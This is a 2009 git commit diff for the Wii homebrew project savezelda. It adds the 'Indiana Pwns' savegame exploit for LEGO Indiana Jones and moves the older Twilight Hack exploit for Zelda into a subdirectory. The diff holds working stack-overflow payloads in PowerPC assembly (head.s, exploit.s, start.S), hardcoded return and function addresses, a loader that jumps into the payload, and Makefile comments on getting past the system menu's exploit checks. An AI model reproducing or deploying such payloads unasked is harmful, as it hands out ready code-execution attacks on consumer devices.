From: Segher Boessenkool Date: Thu, 4 Jun 2009 07:17:38 +0000 (+0200) Subject: LEGO Indiana Jones X-Git-Url: http://wien.tomnetworks.com/gitweb/?p=savezelda.git;a=commitdiff_plain;h=e1ede7aa2cb1840add9ba88901c7495deb2b37e3 LEGO Indiana Jones --- diff --git a/.gitignore b/.gitignore index f63dbb7..3350594 100644 --- a/.gitignore +++ b/.gitignore @@ -1,14 +1,3 @@ *.o .version - -rzd?-?.?.bin -rzd?.data - -rzd??.elf -rzd??.slot - -title.bin - -zero16k -FAILURE diff --git a/Makefile b/Makefile index 278c630..a5a5120 100644 --- a/Makefile +++ b/Makefile @@ -41,111 +41,22 @@ else endif -targets := rzde-3.2.bin rzde-3.3.bin rzde-3.4.bin -targets += rzdj-3.2.bin rzdj-3.3.bin rzdj-3.4.bin -targets += rzdp-3.2.bin rzdp-3.3.bin rzdp-3.4.bin -targets-short := rzde rzdj rzdp - -objs := twilight.o - -ppms := $(targets-short:%=%-icon.ppm) generic-banner.ppm -assets := title.bin $(ppms) - -loader := loader/loader.bin - - -titleid = $(shell perl titleid.pl $(1)) - - -# System menu 3.3 checks for the exploit, when a) you copy a save from SD, -# and b) when the menu starts up; but for a) it only looks at the first -# zeldaTp.dat file, and for b) it allows any file of non-aligned length. -# -# System menu 3.4 only looks at the last file in the wad when installing. -# -# System menu 4.0 finally avoids such silly bugs. - -define twintig - D=$(call titleid,$(1)); \ - $(TOOLS)/twintig $$D $@ toc-$1 -endef - - -all: $(targets) - -$(filter %-3.2.bin,$(targets)): %-3.2.bin: %.data -$(filter %-3.3.bin,$(targets)): %-3.3.bin: %.data zero16k -$(filter %-3.4.bin,$(targets)): %-3.4.bin: %.data FAILURE -$(targets): %.bin: toc-% $(assets) - @echo " TWINTIG $@" - $(Q)$(call twintig,$*) - -saves := $(targets-short:%=%.data) - -rzde.data: rzde0.slot rzde2.slot -rzdp.data: rzdp0.slot -rzdj.data: rzdj0.slot -$(saves): $(loader) - @echo " ZELDAPACK $@" - $(Q)./pack.sh $@ $(filter %.slot,$^) - $(Q)$(TOOLS)/zelda-cksum $@ - $(Q)cat $(loader) >> $@ - $(Q)printf '\0' >> $@ - -slots := rzde0.slot rzde2.slot rzdj0.slot rzdp0.slot - -$(slots): %.slot: %.elf - @echo " OBJCOPY $@" - $(Q)$(OBJCOPY) -Obinary $< $@ - -elfs := $(slots:.slot=.elf) - -rzde0.elf: baddr := 0x8046a3e0+0 -rzde2.elf: baddr := 0x804519e0+0x0a94 -rzdj0.elf: baddr := 0x8044f860+0 -rzdp0.elf: baddr := 0x804522e0+0 -$(elfs): %.elf: twilight.lds %.o $(objs) - @echo " LINK $@" - $(Q)$(LD) --defsym baddr=$(baddr) -T $^ -o $@ - -exploit-objs := $(elfs:.elf=.o) - -$(exploit-objs): slot-name := Twilight Hack -rzde0.o: slot-name := TwilightHack0 -rzde2.o: slot-name := TwilightHack2 -$(exploit-objs): %.o: start.S head.b - @echo " ASSEMBLE $@" - $(Q)$(CC) $(CFLAGS) -D NAME="$(slot-name)" -c $< -o $@ - -%.o: %.c - @echo " COMPILE $@" - $(Q)$(CC) $(CFLAGS) -c $< -o $@ - -title.bin: .version - @echo " TITLEBIN $@" - $(Q)perl make-title-bin.pl > $@ +all: .version: FORCE $(Q)./describe.sh > .$@-tmp $(Q)cmp -s $@ .$@-tmp || cp .$@-tmp $@ $(Q)rm .$@-tmp -$(ppms): %.ppm: %.png - @echo " PPM $@" - $(Q)convert $< $@ - -zero16k: - $(Q)dd if=/dev/zero bs=16384 count=1 2>/dev/null > $@ - -FAILURE: - $(Q)echo FAILURE > $@ - -$(loader): FORCE .version +all: FORCE .version $(Q)$(MAKE) -C loader + $(Q)$(MAKE) -C twilight + $(Q)$(MAKE) -C lego FORCE: clean: - -rm -f $(targets) $(saves) $(elfs) $(exploit-objs) $(objs) $(slots) - -rm -f .version title.bin zero16k FAILURE + -rm -f .version $(MAKE) -C loader clean + $(MAKE) -C twilight clean + $(MAKE) -C lego clean diff --git a/generic-banner.png b/generic-banner.png deleted file mode 100644 index 536d357..0000000 Binary files a/generic-banner.png and /dev/null differ diff --git a/generic-banner.ppm b/generic-banner.ppm deleted file mode 100644 index 7ed37aa..0000000 Binary files a/generic-banner.ppm and /dev/null differ diff --git a/head.b b/head.b deleted file mode 100644 index 7241dfb..0000000 Binary files a/head.b and /dev/null differ diff --git a/lego/.gitignore b/lego/.gitignore new file mode 100644 index 0000000..bcbbaf2 --- /dev/null +++ b/lego/.gitignore @@ -0,0 +1,5 @@ +rli?.bin +FILE_V28 +exploit.bin +exploit.elf +title.bin diff --git a/lego/Makefile b/lego/Makefile new file mode 100644 index 0000000..b1fe162 --- /dev/null +++ b/lego/Makefile @@ -0,0 +1,117 @@ +# Copyright 2008-2009 Segher Boessenkool +# This code is licensed to you under the terms of the GNU GPL, version 2; +# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + + +# Configuration: + +# What toolchain prefix should we use +CROSS ?= broadway- + +# Where are the tools (http://git.infradead.org/users/segher/wii.git) +TOOLS ?= $(HOME)/wii/segher + +# End of configuration. + + + +# Set CC, LD, OBJCOPY based on CROSS, unless they are set already + +ifeq ($(origin CC), default) + CC := $(CROSS)gcc -m32 +endif +ifeq ($(origin LD), default) + LD := $(CROSS)ld +endif +OBJCOPY ?= $(CROSS)objcopy + + +# The compiler flags we need. + +CFLAGS := -Wall -W -Os -ffreestanding -mno-eabi -mno-sdata -mcpu=750 + + +# Build with "V=1" to see the commands executed; be quiet otherwise. + +ifeq ($(V),1) + Q := +else + Q := @ + MAKEFLAGS += --no-print-directory +endif + + +targets := rlie.bin rlij.bin rlip.bin + +ppms := $(targets:%.bin=%-icon.ppm) rli-banner.ppm +assets := title.bin $(ppms) + +loader := ../loader/loader.bin + + +titleid = $(shell perl titleid.pl $(1)) + + +define twintig + D=$(call titleid,$(1)); \ + $(TOOLS)/twintig $$D $@ toc-$1 +endef + + +all: $(targets) + +$(targets): %.bin: toc-% FILE_V28 $(assets) + @echo " TWINTIG $@" + $(Q)$(call twintig,$*) + +FILE_V28: head.bin exploit.bin $(loader) + @echo " LEGOSTACK $@" + $(Q)./pack.sh $@ $^ + $(Q)$(TOOLS)/lego-cksum $@ 32688 + +head.bin: head.elf + @echo " OBJCOPY $@" + $(Q)$(OBJCOPY) -Obinary $< $@ + +exploit.bin: exploit.elf + @echo " OBJCOPY $@" + $(Q)$(OBJCOPY) -Obinary $< $@ + +exploit.elf: baddr := 0x903b0780 +exploit.elf: lego.lds exploit.o + @echo " LINK $@" + $(Q)$(LD) --defsym baddr=$(baddr) -T $^ -o $@ + +head.elf: head.lds head.o + @echo " LINK $@" + $(Q)$(LD) -T $^ -o $@ + +exploit.o: exploit.s + @echo " ASSEMBLE $@" + $(Q)$(CC) $(CFLAGS) -c $< -o $@ + +head.o: head.s head.b + @echo " ASSEMBLE $@" + $(Q)$(CC) $(CFLAGS) -c $< -o $@ + +title.bin: ../.version + @echo " TITLEBIN $@" + $(Q)perl make-title-bin.pl > $@ + +../.version: FORCE + $(Q)$(MAKE) -C .. .version + +$(ppms): %.ppm: %.png + @echo " PPM $@" + $(Q)convert $< $@ + +$(loader): FORCE + $(Q)$(MAKE) -C ../loader + +FORCE: + +clean: + -rm -f $(targets) FILE_V28 + -rm -f exploit.bin exploit.elf exploit.o + -rm -f head.bin head.elf head.o + -rm -f title.bin diff --git a/lego/README b/lego/README new file mode 100644 index 0000000..1fd8677 --- /dev/null +++ b/lego/README @@ -0,0 +1,7 @@ +Extremely short instructions: put this savegame on your Wii (if you have +one on there already that you want to keep, back it up first!), start the +game, walk to the "art room" (find some walkthrough on the intertubes if +you cannot find it), look at the second character, enjoy! + +Kudos to "roto" for finding the original buffer overflow, and many thanks +for doing lots of testing! diff --git a/lego/exploit.s b/lego/exploit.s new file mode 100644 index 0000000..acc423c --- /dev/null +++ b/lego/exploit.s @@ -0,0 +1,31 @@ +# Copyright 2008-2009 Segher Boessenkool +# This code is licensed to you under the terms of the GNU GPL, version 2; +# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + + .section .start,"ax" + +start: + # Set up a stack frame. + lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1) + + # Stop audio and video. + lis 0,audio_stop@h ; ori 0,0,audio_stop@l ; mtctr 0 ; bctrl + lis 0,video_stop@h ; ori 0,0,video_stop@l ; mtctr 0 ; bctrl + + # Move code into place; a generous 32kB, starting at 64kB in + # the save file. + + lis 3,main@h ; ori 3,3,main@l ; addi 5,3,-4 + lis 4,0x806c ; lwz 4,0xdc48-0x10000(4) ; addi 4,4,-4 + addis 4,4,1 ; addi 4,4,end-start + li 0,0x2000 ; mtctr 0 +0: lwzu 0,4(4) ; stwu 0,4(5) ; bdnz 0b + + # Sync caches on it. + li 0,0x0400 ; mtctr 0 ; mr 5,3 +0: dcbst 0,5 ; sync ; icbi 0,5 ; addi 5,5,0x20 ; bdnz 0b + sync ; isync + + # Go for it! + mtctr 3 ; bctr +end: diff --git a/lego/head.b b/lego/head.b new file mode 100644 index 0000000..1bcf35a Binary files /dev/null and b/lego/head.b differ diff --git a/lego/head.lds b/lego/head.lds new file mode 100644 index 0000000..04c1555 --- /dev/null +++ b/lego/head.lds @@ -0,0 +1,22 @@ +/* Copyright 2008-2009 Segher Boessenkool + This code is licensed to you under the terms of the GNU GPL, version 2; + see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */ + +OUTPUT_FORMAT("elf32-powerpc") +OUTPUT_ARCH(powerpc:common) + +SECTIONS { +/* audio_stop = 0x800a3e80; + video_stop = 0x800b2120; + + main = 0x90000020; */ + + .head 0x805a909c : + { + head.o(.start) + *(.text) + *(.rodata .rodata.*) + *(.data) + *(.bss) + } +} diff --git a/lego/head.s b/lego/head.s new file mode 100644 index 0000000..0232fd0 --- /dev/null +++ b/lego/head.s @@ -0,0 +1,26 @@ + .section ".start", "ax" + + # FIXME + bptr = 0x806bdc48 + +0: + .incbin "head.b" + + # Smack the stack. + .long 0x11111111, 0x11111111, 0x11111111, 0x11111111 + .long 0x11111111, 0x11111111, 0x11111111, 0x11111111 + .long 0x11111111, 0x11111111, 0x11111111, 0x11111111 + .long 0x11111111, 0x11111111, 0x11111111, 0x11111111 + .long 0x11111111, 0x11111111, 0x11111111, 0x11111111 + .long 0x11111111, 0x11111111, 0x11111111, 0x11111111 + .long 0x11111111, 0x11111111, 0x11111111, 0x11111111 + .long 0x11111111, 0x11111111, 0x11111111, 0x11111111 + .long 0x11111111 + + # Return address; namely... + .long 0x805b0f30, 0x11111111, 0x11111111, 0x11111111 + + # Here. + lis 3,bptr@ha ; lwz 3,bptr@l(3) ; addis 3,3,1 ; mtctr 3 ; bctr + + .fill 0x10000 - (. - 0b) diff --git a/lego/lego.lds b/lego/lego.lds new file mode 100644 index 0000000..417f36a --- /dev/null +++ b/lego/lego.lds @@ -0,0 +1,22 @@ +/* Copyright 2008-2009 Segher Boessenkool + This code is licensed to you under the terms of the GNU GPL, version 2; + see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */ + +OUTPUT_FORMAT("elf32-powerpc") +OUTPUT_ARCH(powerpc:common) + +SECTIONS { + audio_stop = 0x800a3e80; + video_stop = 0x800b2120; + + main = 0x90000020; + + .twilight baddr : + { + rli*.o(.start) + *(.text) + *(.rodata .rodata.*) + *(.data) + *(.bss) + } +} diff --git a/lego/make-title-bin.pl b/lego/make-title-bin.pl new file mode 100755 index 0000000..a91ae98 --- /dev/null +++ b/lego/make-title-bin.pl @@ -0,0 +1,16 @@ +#!/usr/bin/perl +sub printline { + my $x = shift; + chomp $x; + $x .= "\0" x 32; + $x = substr $x, 0, 32; + $x =~ s/(.)/\0$1/g; + + print $x; +} + +$name = "Indiana Pwns, by Team Twiizers"; +$version = `cat ../.version`; + +printline $name; +printline $version; diff --git a/lego/pack.sh b/lego/pack.sh new file mode 100755 index 0000000..57a388b --- /dev/null +++ b/lego/pack.sh @@ -0,0 +1,3 @@ +#!/bin/bash +TARGET=$1; shift +cat $* /dev/zero | dd bs=1024 count=128 2>/dev/null > $TARGET diff --git a/lego/rli-banner.png b/lego/rli-banner.png new file mode 100644 index 0000000..dfbea83 Binary files /dev/null and b/lego/rli-banner.png differ diff --git a/lego/rli-banner.ppm b/lego/rli-banner.ppm new file mode 100644 index 0000000..238737f Binary files /dev/null and b/lego/rli-banner.ppm differ diff --git a/lego/rlie-icon.png b/lego/rlie-icon.png new file mode 100644 index 0000000..116c466 Binary files /dev/null and b/lego/rlie-icon.png differ diff --git a/lego/rlie-icon.ppm b/lego/rlie-icon.ppm new file mode 100644 index 0000000..684db4a Binary files /dev/null and b/lego/rlie-icon.ppm differ diff --git a/lego/rlij-icon.png b/lego/rlij-icon.png new file mode 100644 index 0000000..b7b17ed Binary files /dev/null and b/lego/rlij-icon.png differ diff --git a/lego/rlij-icon.ppm b/lego/rlij-icon.ppm new file mode 100644 index 0000000..f1c9c55 Binary files /dev/null and b/lego/rlij-icon.ppm differ diff --git a/lego/rlip-icon.png b/lego/rlip-icon.png new file mode 100644 index 0000000..bab2887 Binary files /dev/null and b/lego/rlip-icon.png differ diff --git a/lego/rlip-icon.ppm b/lego/rlip-icon.ppm new file mode 100644 index 0000000..5cda2e7 Binary files /dev/null and b/lego/rlip-icon.ppm differ diff --git a/lego/titleid.pl b/lego/titleid.pl new file mode 100755 index 0000000..f735f1d --- /dev/null +++ b/lego/titleid.pl @@ -0,0 +1,2 @@ +#!/usr/bin/perl +print "00010000", map { sprintf "%02x", ord uc } split //, $ARGV[0]; diff --git a/lego/toc-rlie b/lego/toc-rlie new file mode 100644 index 0000000..6ae5c54 --- /dev/null +++ b/lego/toc-rlie @@ -0,0 +1,4 @@ +title.bin +rli-banner.ppm +rlie-icon.ppm +FILE_V28 FILE_V28 diff --git a/lego/toc-rlij b/lego/toc-rlij new file mode 100644 index 0000000..b7aeb08 --- /dev/null +++ b/lego/toc-rlij @@ -0,0 +1,4 @@ +title.bin +rli-banner.ppm +rlij-icon.ppm +FILE_V28 FILE_V28 diff --git a/lego/toc-rlip b/lego/toc-rlip new file mode 100644 index 0000000..c69f791 --- /dev/null +++ b/lego/toc-rlip @@ -0,0 +1,4 @@ +title.bin +rli-banner.ppm +rlip-icon.ppm +FILE_V28 FILE_V28 diff --git a/loader/main.c b/loader/main.c index 62f6aa6..223b26b 100644 --- a/loader/main.c +++ b/loader/main.c @@ -5,8 +5,8 @@ #include "loader.h" -u8 *code_buffer = (u8 *)0x90100000; -u8 *trampoline_buffer = (u8 *)0x80001800; +static u8 *const code_buffer = (u8 *)0x90100000; +static u8 *const trampoline_buffer = (u8 *)0x80001800; static void dsp_reset(void) { @@ -107,7 +107,7 @@ int main(void) video_init(); usbgecko_init(); - printf("Twilight Hack %s\n", version); + printf("savezelda %s\n", version); printf("\n"); printf("Copyright 2008,2009 Segher Boessenkool\n"); printf("Copyright 2008 Haxx Enterprises\n"); diff --git a/make-title-bin.pl b/make-title-bin.pl deleted file mode 100755 index 4b6ec87..0000000 --- a/make-title-bin.pl +++ /dev/null @@ -1,16 +0,0 @@ -#!/usr/bin/perl -sub printline { - my $x = shift; - chomp $x; - $x .= "\0" x 32; - $x = substr $x, 0, 32; - $x =~ s/(.)/\0$1/g; - - print $x; -} - -$name = "Twilight Hack by Team Twiizers"; -$version = `cat .version`; - -printline $name; -printline $version; diff --git a/pack.sh b/pack.sh deleted file mode 100755 index b1aa666..0000000 --- a/pack.sh +++ /dev/null @@ -1,8 +0,0 @@ -#!/bin/bash -out=$1; shift -dd if=/dev/zero bs=1 count=$((0x4000)) of=$out 2>/dev/null -start=0 -for save in $@; do - dd if=$save of=$out bs=1 seek=$start conv=notrunc 2>/dev/null - start=$((start+0xa94)) -done diff --git a/rzde-icon.png b/rzde-icon.png deleted file mode 100644 index 7e753c9..0000000 Binary files a/rzde-icon.png and /dev/null differ diff --git a/rzde-icon.ppm b/rzde-icon.ppm deleted file mode 100644 index e695ee7..0000000 Binary files a/rzde-icon.ppm and /dev/null differ diff --git a/rzdj-icon.png b/rzdj-icon.png deleted file mode 100644 index 4f865f8..0000000 Binary files a/rzdj-icon.png and /dev/null differ diff --git a/rzdj-icon.ppm b/rzdj-icon.ppm deleted file mode 100644 index 94ce235..0000000 Binary files a/rzdj-icon.ppm and /dev/null differ diff --git a/rzdp-icon.png b/rzdp-icon.png deleted file mode 100644 index d6f9263..0000000 Binary files a/rzdp-icon.png and /dev/null differ diff --git a/rzdp-icon.ppm b/rzdp-icon.ppm deleted file mode 100644 index 4088e74..0000000 Binary files a/rzdp-icon.ppm and /dev/null differ diff --git a/start.S b/start.S deleted file mode 100644 index 5d453aa..0000000 --- a/start.S +++ /dev/null @@ -1,35 +0,0 @@ -// Copyright 2008-2009 Segher Boessenkool -// This code is licensed to you under the terms of the GNU GPL, version 2; -// see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt - -#define XSTR(x) #x -#define ISTR(x) XSTR(x) - - .section .start,"ax" - - // Uninteresting stuff. - .incbin "head.b" - - // "Link". This is displayed on the load menu, so make it nice. -0: .ascii ISTR(NAME) - .fill 17 - (. - 0b) - - // "Epona". Hungry horse eats the stack. - .fill 0xe8,1,'3' - - // The return address on the stack. - .long start - - // Align things properly -- there's code after this. - .fill 7,1,'S' - .balign 4,0 - -start: - // Set up a stack frame. - lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1) - - // Pass the address we are called from, to determine region. - mflr 3 - - // Go for it! - b main diff --git a/titleid.pl b/titleid.pl deleted file mode 100755 index f735f1d..0000000 --- a/titleid.pl +++ /dev/null @@ -1,2 +0,0 @@ -#!/usr/bin/perl -print "00010000", map { sprintf "%02x", ord uc } split //, $ARGV[0]; diff --git a/toc-rzde-3.2 b/toc-rzde-3.2 deleted file mode 100644 index 07bf1a4..0000000 --- a/toc-rzde-3.2 +++ /dev/null @@ -1,4 +0,0 @@ -title.bin -generic-banner.ppm -rzde-icon.ppm -rzde.data zeldaTp.dat diff --git a/toc-rzde-3.3 b/toc-rzde-3.3 deleted file mode 100644 index 03d7fa5..0000000 --- a/toc-rzde-3.3 +++ /dev/null @@ -1,5 +0,0 @@ -title.bin -generic-banner.ppm -rzde-icon.ppm -zero16k zeldaTp.dat -rzde.data zeldaTp.dat diff --git a/toc-rzde-3.4 b/toc-rzde-3.4 deleted file mode 100644 index 30c4035..0000000 --- a/toc-rzde-3.4 +++ /dev/null @@ -1,5 +0,0 @@ -title.bin -generic-banner.ppm -rzde-icon.ppm -rzde.data zeldaTp.dat -FAILURE FAILURE diff --git a/toc-rzdj-3.2 b/toc-rzdj-3.2 deleted file mode 100644 index fdab09e..0000000 --- a/toc-rzdj-3.2 +++ /dev/null @@ -1,4 +0,0 @@ -title.bin -generic-banner.ppm -rzdj-icon.ppm -rzdj.data zeldaTp.dat diff --git a/toc-rzdj-3.3 b/toc-rzdj-3.3 deleted file mode 100644 index 133d563..0000000 --- a/toc-rzdj-3.3 +++ /dev/null @@ -1,5 +0,0 @@ -title.bin -generic-banner.ppm -rzdj-icon.ppm -zero16k zeldaTp.dat -rzdj.data zeldaTp.dat diff --git a/toc-rzdj-3.4 b/toc-rzdj-3.4 deleted file mode 100644 index d32c4f8..0000000 --- a/toc-rzdj-3.4 +++ /dev/null @@ -1,5 +0,0 @@ -title.bin -generic-banner.ppm -rzdj-icon.ppm -rzdj.data zeldaTp.dat -FAILURE FAILURE diff --git a/toc-rzdp-3.2 b/toc-rzdp-3.2 deleted file mode 100644 index e58ce07..0000000 --- a/toc-rzdp-3.2 +++ /dev/null @@ -1,4 +0,0 @@ -title.bin -generic-banner.ppm -rzdp-icon.ppm -rzdp.data zeldaTp.dat diff --git a/toc-rzdp-3.3 b/toc-rzdp-3.3 deleted file mode 100644 index bbdb572..0000000 --- a/toc-rzdp-3.3 +++ /dev/null @@ -1,5 +0,0 @@ -title.bin -generic-banner.ppm -rzdp-icon.ppm -zero16k zeldaTp.dat -rzdp.data zeldaTp.dat diff --git a/toc-rzdp-3.4 b/toc-rzdp-3.4 deleted file mode 100644 index e642bf4..0000000 --- a/toc-rzdp-3.4 +++ /dev/null @@ -1,5 +0,0 @@ -title.bin -generic-banner.ppm -rzdp-icon.ppm -rzdp.data zeldaTp.dat -FAILURE FAILURE diff --git a/twilight.c b/twilight.c deleted file mode 100644 index 9ce9a2b..0000000 --- a/twilight.c +++ /dev/null @@ -1,222 +0,0 @@ -// Copyright 2008-2009 Segher Boessenkool -// This code is licensed to you under the terms of the GNU GPL, version 2; -// see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt - -#undef DEBUG_GECKO -#undef DEBUG_BLINK - -typedef unsigned int u32; -typedef unsigned char u8; - -int nand_open_E0(const char *path, void *buf, u32 mode); -int nand_open_E2(const char *path, void *buf, u32 mode); -int nand_open_J0(const char *path, void *buf, u32 mode); -int nand_open_P0(const char *path, void *buf, u32 mode); - -int nand_read_E0(void *buf, void *dest, u32 len); -int nand_read_E2(void *buf, void *dest, u32 len); -int nand_read_J0(void *buf, void *dest, u32 len); -int nand_read_P0(void *buf, void *dest, u32 len); - -void audio_stop_E0(void); -void audio_stop_E2(void); -void audio_stop_J0(void); -void audio_stop_P0(void); - -void graphics_stop_E0(void); -void graphics_stop_E2(void); -void graphics_stop_J0(void); -void graphics_stop_P0(void); - -static u8 nand_buf[0x100] __attribute__ ((aligned(0x40))); - -#ifdef DEBUG_GECKO -void gecko_print(void *, const char *); - -#define PRINT(x) gecko_print(0, x) -#define HEX(x) hex(x) - -static void hex(u32 x) -{ - u32 i; - u32 digit; - char s[10]; - - for (i = 0; i < 8; i++) { - digit = x >> 28; - x <<= 4; - s[i] = digit + '0' + (digit < 10 ? 0 : 'a' - 10 - '0'); - } - s[8] = '\n'; - s[9] = 0; - PRINT(s); -} -#else -#define PRINT(x) do { } while (0) -#define HEX(x) do { } while (0) -#endif - -static void sync_cache(void *p, u32 n) -{ - u32 start, end; - - start = (u32)p & ~31; - end = ((u32)p + n + 31) & ~31; - n = (end - start) >> 5; - - while (n--) { - asm("dcbst 0,%0 ; icbi 0,%0" : : "b"(p)); - p += 32; - } - asm("sync ; isync"); -} - -static void sync_before_read(void *p, u32 n) -{ - u32 start, end; - - start = (u32)p & ~31; - end = ((u32)p + n + 31) & ~31; - n = (end - start) >> 5; - - while (n--) { - asm("dcbf 0,%0" : : "b"(p)); - p += 32; - } - asm("sync"); -} - -static void jump(void *p, u32 arg) -{ - PRINT("taking the plunge...\n"); - - asm("mr 3,%1 ; mtctr %0 ; bctrl" : : "r"(p), "r"(arg) : "r3"); - - PRINT("whoops, payload returned to us\n"); -} - -#ifdef DEBUG_BLINK -static u32 read32(u32 addr) -{ - u32 x; - - asm volatile("lwz %0,0(%1) ; sync" : "=r"(x) : "b"(0xc0000000 | addr)); - - return x; -} - -static void write32(u32 addr, u32 x) -{ - asm("stw %0,0(%1) ; eieio" : : "r"(x), "b"(0xc0000000 | addr)); -} - -static void blink(u32 colour) -{ - u32 *fb = (u32 *)0xC0F00000; - u32 i; - - // blink tray led - write32(0x0d8000c0, read32(0x0d8000c0) ^ 0x20); - - for (i = 0; i < 640*576/2; i++) - fb[i] = colour; -} -#else -#define blink(x) do { } while(0) -#endif - -void __attribute__ ((noreturn)) main(u32 baddr) -{ - int ret, i, len; - char *area; - char *gameid = (char *)0x80000000; - int (*nand_open)(const char *path, void *buf, u32 mode); - int (*nand_read)(void *buf, void *dest, u32 len); - void (*audio_stop)(void); - void (*graphics_stop)(void); - - PRINT("Hello, Brave New World!\n"); - - baddr -= 0x2c0; - - switch (gameid[3]) { - case 'E': - if ((baddr>>16) == 0x8045) { - nand_open = nand_open_E2; - nand_read = nand_read_E2; - audio_stop = audio_stop_E2; - graphics_stop = graphics_stop_E2; - } else { - nand_open = nand_open_E0; - nand_read = nand_read_E0; - audio_stop = audio_stop_E0; - graphics_stop = graphics_stop_E0; - } - break; - case 'P': - nand_open = nand_open_P0; - nand_read = nand_read_P0; - audio_stop = audio_stop_P0; - graphics_stop = graphics_stop_P0; - break; - case 'J': - nand_open = nand_open_J0; - nand_read = nand_read_J0; - audio_stop = audio_stop_J0; - graphics_stop = graphics_stop_J0; - break; - default: - PRINT("unsupported game region\n"); - for (;;) - ; - } - - audio_stop(); - graphics_stop(); - - blink(0x266a26c0); // maroon - - ret = nand_open("zeldaTp.dat", nand_buf, 1); - - blink(0x7140718a); // olive - - PRINT("nand open --> "); - HEX(ret); - - area = (void *)0x90000020; - - // Skip past save game, to loader.bin - ret = nand_read(nand_buf, area, 0x4000); - - len = 0; - for (i = 0; i < 0x40; i++) { - PRINT("reading bootloader page: "); - HEX(i); - - blink(0x40804080 + i*0x02000200); // grey - - sync_before_read(area + 0x1000*i, 0x1000); - ret = nand_read(nand_buf, area + 0x1000*i, 0x1000); - len += ret; - - blink(0x552b5515 + i*0x02000200); // lime - - PRINT("--> "); - HEX(ret); - PRINT("\n"); - } - - for (i = 0; i < 0x100; i++) - HEX(((u32 *)area)[i]); - - blink(0xc399c36a); // sky blue - - sync_cache(area, len); - jump(area, 0x123); - - blink(0x4c544cff); // red - - PRINT("(shouldn't happen)\n"); - for (;;) - ; -} diff --git a/twilight.lds b/twilight.lds deleted file mode 100644 index a871cdc..0000000 --- a/twilight.lds +++ /dev/null @@ -1,40 +0,0 @@ -/* Copyright 2008-2009 Segher Boessenkool - This code is licensed to you under the terms of the GNU GPL, version 2; - see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */ - -OUTPUT_FORMAT("elf32-powerpc") -OUTPUT_ARCH(powerpc:common) - -SECTIONS { - gecko_print = 0x802facf0; - - nand_open_E0 = 0x80371f50; - nand_read_E0 = 0x80371710; - audio_stop_E0 = 0x8034607c; - graphics_stop_E0 = 0x8035c930; - - nand_open_E2 = 0x8035c988; - nand_read_E2 = 0x8035c148; - audio_stop_E2 = 0x80330a4c; - graphics_stop_E2 = 0x80347368; - - nand_open_P0 = 0x8035cdb8; - nand_read_P0 = 0x8035c578; - audio_stop_P0 = 0x80330e7c; - graphics_stop_P0 = 0x80347798; - - nand_open_J0 = 0x8035e440; - nand_read_J0 = 0x8035dc00; - audio_stop_J0 = 0x8033256c; - graphics_stop_J0 = 0x80348e20; - - .twilight baddr : - { - rzd*.o(.start) - *(.text) - *(.rodata .rodata.*) - *(.data) - *(.bss) - . = 0x0a94; - } -} diff --git a/twilight/.gitignore b/twilight/.gitignore new file mode 100644 index 0000000..31b1b14 --- /dev/null +++ b/twilight/.gitignore @@ -0,0 +1,10 @@ +rzd?-?.?.bin +rzd?.data + +rzd??.elf +rzd??.slot + +title.bin + +zero16k +FAILURE diff --git a/twilight/Makefile b/twilight/Makefile new file mode 100644 index 0000000..315fd28 --- /dev/null +++ b/twilight/Makefile @@ -0,0 +1,148 @@ +# Copyright 2008-2009 Segher Boessenkool +# This code is licensed to you under the terms of the GNU GPL, version 2; +# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + + +# Configuration: + +# What toolchain prefix should we use +CROSS ?= broadway- + +# Where are the tools (http://git.infradead.org/users/segher/wii.git) +TOOLS ?= $(HOME)/wii/segher + +# End of configuration. + + + +# Set CC, LD, OBJCOPY based on CROSS, unless they are set already + +ifeq ($(origin CC), default) + CC := $(CROSS)gcc -m32 +endif +ifeq ($(origin LD), default) + LD := $(CROSS)ld +endif +OBJCOPY ?= $(CROSS)objcopy + + +# The compiler flags we need. + +CFLAGS := -Wall -W -Os -ffreestanding -mno-eabi -mno-sdata -mcpu=750 + + +# Build with "V=1" to see the commands executed; be quiet otherwise. + +ifeq ($(V),1) + Q := +else + Q := @ + MAKEFLAGS += --no-print-directory +endif + + +targets := rzde-3.2.bin rzde-3.3.bin rzde-3.4.bin +targets += rzdj-3.2.bin rzdj-3.3.bin rzdj-3.4.bin +targets += rzdp-3.2.bin rzdp-3.3.bin rzdp-3.4.bin +targets-short := rzde rzdj rzdp + +objs := twilight.o + +ppms := $(targets-short:%=%-icon.ppm) generic-banner.ppm +assets := title.bin $(ppms) + +loader := ../loader/loader.bin + + +titleid = $(shell perl titleid.pl $(1)) + + +# System menu 3.3 checks for the exploit, when a) you copy a save from SD, +# and b) when the menu starts up; but for a) it only looks at the first +# zeldaTp.dat file, and for b) it allows any file of non-aligned length. +# +# System menu 3.4 only looks at the last file in the wad when installing. +# +# System menu 4.0 finally avoids such silly bugs. + +define twintig + D=$(call titleid,$(1)); \ + $(TOOLS)/twintig $$D $@ toc-$1 +endef + + +all: $(targets) + +$(filter %-3.2.bin,$(targets)): %-3.2.bin: %.data +$(filter %-3.3.bin,$(targets)): %-3.3.bin: %.data zero16k +$(filter %-3.4.bin,$(targets)): %-3.4.bin: %.data FAILURE +$(targets): %.bin: toc-% $(assets) + @echo " TWINTIG $@" + $(Q)$(call twintig,$*) + +saves := $(targets-short:%=%.data) + +rzde.data: rzde0.slot rzde2.slot +rzdp.data: rzdp0.slot +rzdj.data: rzdj0.slot +$(saves): $(loader) + @echo " ZELDAPACK $@" + $(Q)./pack.sh $@ $(filter %.slot,$^) + $(Q)$(TOOLS)/zelda-cksum $@ + $(Q)cat $(loader) >> $@ + $(Q)printf '\0' >> $@ + +slots := rzde0.slot rzde2.slot rzdj0.slot rzdp0.slot + +$(slots): %.slot: %.elf + @echo " OBJCOPY $@" + $(Q)$(OBJCOPY) -Obinary $< $@ + +elfs := $(slots:.slot=.elf) + +rzde0.elf: baddr := 0x8046a3e0+0 +rzde2.elf: baddr := 0x804519e0+0x0a94 +rzdj0.elf: baddr := 0x8044f860+0 +rzdp0.elf: baddr := 0x804522e0+0 